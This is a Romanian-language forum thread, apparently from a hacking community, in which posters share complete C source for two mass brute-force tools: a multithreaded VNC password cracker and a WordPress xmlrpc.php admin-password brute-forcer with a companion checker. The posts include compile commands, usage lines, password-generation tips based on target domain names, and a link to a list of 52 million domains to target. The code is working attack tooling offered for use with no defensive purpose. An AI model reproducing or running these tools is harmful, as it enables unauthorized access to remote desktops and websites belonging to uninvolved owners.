
  1. Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid. Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <openssl/des.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <signal.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <pthread.h> #include <ctype.h> #define RED "\E[1;32;31m" #define GREEN "\E[1;32;40m" #define WHITE "\E[1;37;40m" #define NORMAL "\E[m" #define CLEARLN "\033[F\033[J" #define CONNECT_TIMEOUT 2 #define READ_TIMEOUT 5 #define LOCK(x) pthread_mutex_lock(&x); #define UNLOCK(x) pthread_mutex_unlock(&x); static int maxqueue = 0; static int brutemode = 0; struct host_queue{ char * host; char * pass; struct host_queue * next; }; struct combi { char * host; char * pass; }; static time_t start, lmin; static FILE *ipfile = NULL; static FILE *outfile = NULL; static FILE *passfile = NULL; static int finished = 0; static int done = 0; static int good = 0; static int total = 0; static long qsize = 0; static long lastmin = 0; static int dmin = 0; static struct host_queue * jobs = NULL; static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER; static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER; static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void save_no_auth(const char *host) { FILE *noauth = 
fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth); } static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist); } static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock); } static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow; } static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n; } static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n; } static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, 
plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL; } static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900); retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = 
recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; 
printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); } first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1; } static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL); } int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; 
else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); 
queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0); } Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati: ./vnc check listaipuri numarthreaduri Daca doriti sa faceti bruteforce direct: ./vnc brute listaipuri listaparole numarthreaduri Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj
  2. La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...
  3. Aici aveti si o lista de 52mil domenii sa nu va plictisiti gangsta.club/xdom.txt
  4. Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == 
EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; 
time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } 
strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = 
fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); 
strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii